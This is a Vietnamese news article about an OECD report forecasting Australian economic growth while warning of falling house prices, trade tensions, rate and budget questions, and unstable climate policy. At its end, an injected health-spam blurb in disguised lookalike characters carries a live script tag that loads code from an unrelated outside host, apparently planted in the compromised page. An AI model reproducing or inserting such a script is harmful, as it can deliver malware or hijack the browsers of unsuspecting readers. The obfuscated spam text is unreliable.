RSS

Úc đang trên đà phát triển kinh tế nhưng giá nhà vẫn giảm

09:30 14/12/2018

Theo báo cáo mới nhất từ Tổ chức Hợp tác và Phát triển Kinh tế (hay còn gọi là OECD) của Úc cho thấy Úc đang trên đà phát triển kinh tế trong năm tới.

Kết quả hình ảnh cho Úc đang trên đà phát triển kinh tế nhưng giá nhà vẫn giảm

Nhưng OECD nói rằng không phải tất cả khía cạnh của nền kinh tế đều có chuyển biến tích cực, với những lo ngại khác xung quanh thị trường nhà đất, chính sách thay đổi khí hậu của đất nước và những ảnh hưởng căng thẳng của thương mại toàn cầu.

OECD, cơ quan kinh tế hàng đầu thế giới đã vẽ ra một bức tranh tích cực về nền kinh tế của Úc, báo cáo cho biết nền kinh tế Úc đang trên đà tãng trưởng ba phần trăm trong năm tới.

Nhưng Tổ chức Hợp tác và Phát triển Kinh tế OECD cho biết giá nhà đất ở Úc có thể tạo nên một lỗ hỏng lớn, kéo theo đó là tình trạng tồi tệ của thị trường nhà đất trong thời gian tới. 

Theo đánh giá mới nhất của OECD về nền kinh tế Úc cho biết, trong khi giá nhà giảm dần kể từ cuối năm ngoái, thị trường nhà đất vẫn đang trên đà giảm giá và giá nhà sẽ vẫn ổn định sau một thời gian ngắn giảm mạnh.

Nhà kinh tế học cao cấp của OECD, ông Phil Hemmings chỉ ra nước Úc đang đối mặt với những căng thẳng thương mại toàn cầu và khả năng nhỏ thị trường địa ốc bị suy thoái. 

"Có những điều không chắc chắn và không mong đợi trong triển vọng toàn cầu, đặc biệt liên quan đến các vấn đề thương mại, như chúng ta đã đọc được. Nền kinh tế trong nước, tất nhiên, sẽ có rủi ro, có thể là nhỏ thôi, đó là việc giảm giá trong thị trường bất động sản."

Báo cáo của OECD cho thấy sự không chắc chắn xung quanh việc xuất khẩu sang Trung Quốc và những tiềm năng cho thấy sự căng thẳng của thương mại toàn cầu đang leo thang, đây có thể xem là mối lo ngại cho nền kinh tế Úc.

Nhưng Sarah Hunter của BIS Oxford Economics nói, trong khi nền kinh tế của Úc phụ thuộc nhiều vào Trung Quốc, Trung Quốc đã đưa ra các biện pháp để giảm thiểu mọi tác động.

"Vâng, có thể chúng ta sẽ thấy có sự suy giảm so với nền kinh tế Trung Quốc, sự suy giảm này có thể mạnh hơn so với những gì chúng ta đang mong đợi, nhưng chính phủ đang thực hiện các bước nhằm giảm thiểu rủi ro đó. Vì vậy, tuy rằng đây là một rủi ro, nhưng theo tôi thấy đó là một rủi ro xác suất tương đối thấp so với tình hình kinh tế hiện tại. Tôi không mong đợi sự suy giảm mạnh trong nền kinh tế Trung Quốc và tôi không cho rằng các nhà xuất khẩu của chúng ta sẽ bị ảnh hýởng nặng nề bởi đối tác Trung Quốc trong tương lai."

Trong báo cáo, OECD cũng đã kêu gọi lãi suất sẽ dần được dỡ bỏ khi tãng trưởng tiếp tục và lạm phát tăng chậm.

Ngân hàng Dự trữ Úc đã giữ lãi suất chính thức ở mức thấp kỷ lục 1,5% kể từ tháng 8 nãm 2016 và đã báo hiệu rằng sẽ không có khả năng thay đổi sớm.

OECD cũng đã khuyến nghị Chính phủ Liên bang tiếp tục bảo thủ tài chính và đưa ngân sách trở lại thặng dư, bất chấp áp lực phải dỡ bỏ chi tiêu công.

Bộ trưởng Ngân khố Liên bang Josh Frydenberg nói trong một tuyên bố rằng ông biết Chính phủ Liên đảng đang đi đúng hướng. 

"Kế hoạch kinh tế của Chính phủ Liên đảng đang mang lại cho đất nước này một nền kinh tế mạnh mẽ hơn và giúp chúng tôi cung cấp các dịch vụ thiết yếu mà người Úc cần. Nhý OECD nói, 'Úc phải đối mặt với những thách thức kinh tế, nếu không được xử lý tốt, có thể thấy sự tụt giảm mạnh trong những báo cáo kinh tế . 'Úc không thể mạo hiểm quay trở lại cách thức 'đánh thuế cao' và thiếu thận trọng trong hành động của Lao động."

Nhưng Sarah Hunter, từ BIS Oxford Economics, nói rằng thật khó để nói chi tiêu của đất nước sẽ như thế nào trong một năm tới, đặc biệt là trước cuộc bầu cử Liên bang sắp tới.

"Rõ ràng, phí chi tiêu sinh hoạt và chính sách thuế phụ thuộc rất lớn vào kết quả của cuộc bầu cử sắp tới. Vì vậy, chúng ta sẽ phải chờ xem. Tôi nghĩ thật công bằng khi nói rằng chúng ta có thể thấy một số thay đổi, và chính chúng ta sau đó sẽ phải 'đánh giá lại', một khi chúng ta biết chính xác chính sách sẽ như thế nào. Thật khó để có thể nói bất kỳ điều gì tại thời điểm này."

Báo cáo của OECD cũng nhấn mạnh rằng một số nhóm ngýời dễ bị ảnh hưởng nặng nề khi phải đối mặt với bị trường lao động đang sụt giảm và nguy cơ đói nghèo cao.

Điều này cũng nói lên rằng khoảng cách đáng kể giữa người Úc thổ dân và phần còn lại của dân số đang thu hẹp quá chậm.

Đại diện cho người Úc thổ dân và cũng là cựu chủ tịch đảng Lao động, ông Warren Mundine nói rằng ông đồng ý rằng các bang và vùng lãnh thổ tại Úc nên chịu trách nhiệm nhiều hơn.

"Nếu bạn để ý thì hằng năm tại buổi báo cáo Thu ngắn khoảng cách- Closing the Gap trước Quốc hội của Thủ tướng, chúng ta có quá nhiều điều quên đề cập bao gồm những nhiều vấn đề về sức khỏe, nhà ở, giáo dục..., là đó là những vấn đề to tát tại Quốc hội. Chúng ta cũng cần những người đại diện tại buổi trình bày của Thủ tưởng, để Chính phủ lắng nghe thêm những chuyện chưa được đề cập tại Quốc hội."

Báo cáo cũng đã nhắm đến chính sách thay đổi khí hậu tại Úc và cũng nói rằng nó vẫn thiếu sự rõ ràng và ổn định.

OECD cho biết những thay đổi thường xuyên trong chính sách đã tạo ra sự không chắc chắn cho các công ty, chính sách không chắc chắn này hiện không khuyến khích các nhà đầu tư tập trung cho ngành năng lượng tại Úc.

Người phát ngôn ngân khố đảng đối lập Bộ Tài chính, ông Chris Bowen nói rằng chỉ có chính phủ Lao động mới có thể cung cấp sự nhất quán hơn trong ngành năng lượng. 

"Chúng ta cần đầu tư nhiều hơn vào nãng lượng, và chúng tôi cần sự ổn định và chắc chắn về chính sách để cung cấp cho các công ty và nhà đầu tư. Và chỉ Chính phủ Lao động Shorten mới có thể cung cấp chính sách nãng lượng ổn định hơn. Và chỉ Chính phủ Lao động Shorten mới có thể cung cấp ngân sách thặng dư lớn hơn, lớn trong giai đoạn ngắn trước mắt và lớn hơn đáng kể trong gian đoạn trung hạn, cũng như đưa ra cải cách thuế hợp lý, có cấu trúc tốt, được hiệu chỉnh tốt hơn."

Nhưng bà Hunter nói rằng cả hai đảng lớn cần phải rõ ràng hõn và đề ra chính sách nãng lượng phù hợp.

"Chúng ta cần đặt ra một khuôn khổ cho chính sách nãng lượng và biến đổi khí hậu, chính sách này cần vượt ra ngoài những lợi ích của các chính phủ để giúp các công ty năng lượng và các nhà đầu tư có thể hiểu rõ được chính sách và họ có thể đưa ra quyết định đầu tư phù hợp. Vì vậy, tôi nghĩ rằng đây thực sự là một thách thức đối với cả hai bên, đặc biệt là giải quyết triệt để vấn đề này trong cuộc bầu cử sắp tới và việc đưa ra chính sách thay đổi khí hậu bị ảnh hưởng một lần nữa như thế nào."

Nguồn: Sbs.com.au

 

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.